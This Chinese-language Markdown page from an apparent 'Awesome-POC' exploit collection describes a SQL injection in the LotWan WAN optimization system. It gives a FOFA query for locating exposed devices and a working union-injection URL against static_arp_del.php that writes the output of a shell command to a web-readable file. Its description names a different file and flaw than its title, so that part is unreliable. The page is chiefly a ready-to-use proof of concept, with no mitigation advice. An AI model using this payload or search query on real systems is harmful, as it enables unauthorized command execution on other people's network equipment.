Awesome-POC/网络设备漏洞/华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞.md
2022-05-19 18:49:40 +08:00

33 lines
820 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞
## 漏洞描述
华夏创新 LotWan广域网优化系统check_instance_state.php文件参数 ins存在命令拼接导致远程命令执行漏洞
## 漏洞影响
```
华夏创新 LotWan广域网优化系统
```
## FOFA
```
title="LotWan 广域网优化系统"
```
## 漏洞复现
登录页面
![image-20220519182931309](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191829394.png)
存在漏洞的文件为 static_arp_del.php, 通过union注入写入文件
```
/acc/bindipmac/static_arp_del.php?x=1&arpName=1' and 0 union select 1,'||id>cmd.txt||',3,4,5,6,7,8--
```
再访问 `/acc/bindipmac/cmd.txt`
![image-20220519182946695](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191829769.png)